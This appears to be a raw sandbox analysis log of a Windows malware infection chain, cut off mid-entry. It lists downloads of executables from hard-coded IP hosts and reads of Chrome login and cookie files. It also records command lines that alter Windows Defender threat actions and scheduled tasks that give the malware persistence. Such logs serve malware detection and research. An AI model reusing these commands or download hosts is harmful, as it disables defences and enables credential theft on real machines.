suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://77.91.77.81/lend/upd.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://77.91.77.81/lend/setup222.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://77.91.77.81/lend/gold.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://77.91.77.81/lend/lummac2.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://77.91.77.81/lend/onecommander.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://77.91.77.81/lend/drivermanager.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.172.128.19/NewKindR.exe
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://185.172.128.19/ghsdh39s/index.php
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://77.91.77.81/lend/servoces64.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.172.128.19/b2c2c1.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.172.128.19/FirstZ.exe
suspicious_features GET method with no useragent header suspicious_request GET https://d1i94yju6i4l9g.cloudfront.net/setup.exe
suspicious_features GET method with no useragent header suspicious_request GET https://kmsandallapp.ru/Gibson.exe
request POST http://147.45.47.155/ku4Nor9/index.php
request GET http://77.91.77.81/cost/sarra.exe
request GET http://77.91.77.81/soka/random.exe
request GET http://77.91.77.81/cost/random.exe
request GET http://77.91.77.81/well/random.exe
request POST http://77.91.77.81/Kiru9gu/index.php
request GET http://77.91.77.81/lend/judit.exe
request GET http://77.91.77.81/lend/redline123123.exe
request GET http://77.91.77.81/lend/upd.exe
request GET http://77.91.77.81/lend/setup222.exe
request GET http://77.91.77.81/lend/gold.exe
request GET http://77.91.77.81/lend/lummac2.exe
request GET http://77.91.77.81/lend/onecommander.exe
request GET http://77.91.77.81/lend/drivermanager.exe
request GET http://apps.identrust.com/roots/dstrootcax3.p7c
request GET http://185.172.128.19/NewKindR.exe
request POST http://185.172.128.19/ghsdh39s/index.php
request GET http://77.91.77.81/lend/servoces64.exe
request GET http://185.172.128.19/b2c2c1.exe
request GET http://185.172.128.19/FirstZ.exe
request GET http://x1.i.lencr.org/
request GET https://d1i94yju6i4l9g.cloudfront.net/setup.exe
request GET https://db-ip.com/demo/home.php?s=175.208.134.152
request GET https://kmsandallapp.ru/Gibson.exe
request POST http://147.45.47.155/ku4Nor9/index.php
request POST http://77.91.77.81/Kiru9gu/index.php
request POST http://185.172.128.19/ghsdh39s/index.php
domain kmsandallapp.ru description Russian Federation domain TLD
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2548
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76faf000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2548
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76f20000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2548
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 188416
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00e81000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2548
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a80000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2548
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a90000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2548
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00b60000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00bb0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00cc0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00cd0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00de0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00e70000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02780000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028e0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ac0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b60000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b70000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00b60000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00b60000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00b60000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00b60000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00b60000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2548
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73402000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03150000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1452
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000004170000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2828
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76faf000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2828
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76f20000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2828
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 188416
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00241000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x021a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x021f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02200000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02250000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02260000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02570000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026c0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02720000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02770000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027c0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027e0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02830000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
description axplong.exe tried to sleep 1067 seconds, actually delayed analysis time by 1067 seconds
description a2772ea559.exe tried to sleep 320 seconds, actually delayed analysis time by 320 seconds
description explortu.exe tried to sleep 1136 seconds, actually delayed analysis time by 1136 seconds
Application Crash Process chrome.exe with pid 2808 crashed
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
0x5a2e04
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30

exception.instruction_r: ff 15 16 1f 09 00 ff 25 00 00 00 00 aa a4 c1 76
exception.instruction: call qword ptr [rip + 0x91f16]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x5a2e04
registers.r14: 184020784
registers.r15: 184021224
registers.rcx: 200
registers.rsi: 17302540
registers.r10: 0
registers.rbx: 58142400
registers.rsp: 184019960
registers.r11: 184024480
registers.r8: 1994752396
registers.r9: 0
registers.rdx: 1508
registers.r12: 33338656
registers.rbp: 184020096
registers.rdi: 33075904
registers.rax: 5910016
registers.r13: 184020656
1 0 0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\lockfile
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-spare.pma
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Bloom Prefix Set
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing IP Blacklist
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics.pma
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Module Whitelist
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\ChromeFilenameClientIncident.store
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Side-Effect Free Whitelist
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing UwS List Prefix Set
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Inclusion Whitelist
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Csd Whitelist
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-666D1B6A-AF8.pma
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics-active.pma
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Extension Blacklist
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics-spare.pma
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Resource Blacklist
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\First Run
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\reports
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Download Whitelist
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Download
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\AnyIpMalware.store
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing UwS List
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Bloom
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\metadata
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\index
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_1
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_2
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_3
domain ipinfo.io
file C:\Users\test22\AppData\Local\Temp\onefile_776_133629000743281250\stub.exe
file C:\Users\test22\AppData\Local\Temp\onefile_776_133629000743281250\libcrypto-1_1.dll
file C:\Users\test22\AppData\Local\Temp\onefile_776_133629000743281250\libssl-1_1.dll
file C:\Users\test22\AppData\Local\Temp\1000304001\b2c2c1.exe
file C:\Users\test22\AppData\Local\Temp\1000035001\gold.exe
file C:\Users\test22\AppData\Local\Temp\1000064001\NewKindR.exe
file C:\Users\test22\AppData\Local\Temp\onefile_776_133629000743281250\libffi-7.dll
file C:\Users\test22\AppData\Local\Temp\1000025001\setup222.exe
file C:\Users\test22\AppData\Local\Temp\SetupWizard.exe
file C:\Users\test22\AppData\Local\Temp\1000307001\setup.exe
file C:\Users\test22\AppData\Local\Temp\onefile_776_133629000743281250\python310.dll
file C:\Users\test22\1000015002\d7e4153d35.exe
file C:\Users\test22\AppData\Local\Temp\onefile_776_133629000743281250\python3.dll
file C:\Users\test22\AppData\Local\Temp\1000306001\FirstZ.exe
file C:\Users\test22\AppData\Local\Temp\7zSB243.tmp\Install.exe
file C:\Users\test22\AppData\Local\Temp\7zSB4F3.tmp\Install.exe
file C:\Users\test22\AppData\Local\Temp\12.exe
file C:\Users\test22\AppData\Local\Temp\1000008001\upd.exe
file C:\Users\test22\AppData\Local\Temp\1000047001\lummac2.exe
file C:\Users\test22\AppData\Local\Temp\1000005001\judit.exe
file C:\Users\test22\AppData\Local\Temp\1000017001\db324166b9.exe
file C:\Users\test22\AppData\Local\Temp\onefile_776_133629000743281250\vcruntime140.dll
file C:\Users\test22\AppData\Local\Temp\1000016001\a2772ea559.exe
file C:\Users\test22\AppData\Local\Temp\1000063001\drivermanager.exe
file C:\Users\test22\AppData\Local\Temp\1000007001\redline123123.exe
file C:\Users\test22\AppData\Local\Temp\1000060001\onecommander.exe
file C:\Users\test22\AppData\Local\Temp\onefile_776_133629000743281250\sqlite3.dll
file C:\Users\test22\AppData\Local\Temp\1000068001\servoces64.exe
file C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline powershell start-process -WindowStyle Hidden gpupdate.exe /force
cmdline "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN NewKindR.exe /TR "C:\Users\test22\AppData\Local\Temp\1000064001\NewKindR.exe" /F
cmdline forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
cmdline schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline cmd /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
cmdline schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
cmdline forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewKindR.exe /TR "C:\Users\test22\AppData\Local\Temp\1000064001\NewKindR.exe" /F
cmdline /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
file C:\Users\test22\AppData\Local\Temp\9217037dc9\explortu.exe
file C:\Users\test22\AppData\Local\Temp\1000016001\a2772ea559.exe
file C:\Users\test22\AppData\Local\Temp\1000017001\db324166b9.exe
file C:\Users\test22\AppData\Local\Temp\8254624243\axplong.exe
file C:\Users\test22\AppData\Local\Temp\1000005001\judit.exe
file C:\Users\test22\AppData\Local\Temp\1000007001\redline123123.exe
file C:\Users\test22\AppData\Local\Temp\1000008001\upd.exe
file C:\Users\test22\AppData\Local\Temp\1000025001\setup222.exe
file C:\Users\test22\AppData\Local\Temp\1000035001\gold.exe
file C:\Users\test22\AppData\Local\Temp\1000047001\lummac2.exe
file C:\Users\test22\AppData\Local\Temp\1000060001\onecommander.exe
file C:\Users\test22\AppData\Local\Temp\1000064001\NewKindR.exe
file C:\Users\test22\AppData\Local\Temp\1000068001\servoces64.exe
file C:\Users\test22\AppData\Local\Temp\onefile_776_133629000743281250\stub.exe
file C:\Users\test22\AppData\Local\Temp\12.exe
file C:\Users\test22\AppData\Local\Temp\1000304001\b2c2c1.exe
file C:\Users\test22\AppData\Local\Temp\1000306001\FirstZ.exe
file C:\Users\test22\AppData\Local\Temp\1000307001\setup.exe
file C:\Users\test22\AppData\Local\Temp\1000008001\upd.exe
file C:\Users\test22\AppData\Local\Temp\1000064001\NewKindR.exe
file C:\Users\test22\AppData\Local\Temp\9217037dc9\explortu.exe
file C:\Users\test22\AppData\Local\Temp\1000016001\a2772ea559.exe
file C:\Users\test22\AppData\Local\Temp\1000307001\setup.exe
file C:\Users\test22\AppData\Local\Temp\1000035001\gold.exe
file C:\Users\test22\AppData\Local\Temp\12.exe
file C:\Users\test22\AppData\Local\Temp\1000007001\redline123123.exe
file C:\Users\test22\AppData\Local\Temp\8254624243\axplong.exe
file C:\Users\test22\AppData\Local\Temp\1000047001\lummac2.exe
file C:\Users\test22\AppData\Local\Temp\1000304001\b2c2c1.exe
file C:\Users\test22\AppData\Local\Temp\1000017001\db324166b9.exe
wmi <INVALID POINTER>
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\9217037dc9\explortu.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\9217037dc9\explortu.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\1000015002\d7e4153d35.exe
parameters:
filepath: C:\Users\test22\1000015002\d7e4153d35.exe
1 1 0

ShellExecuteExW

show_type: 0
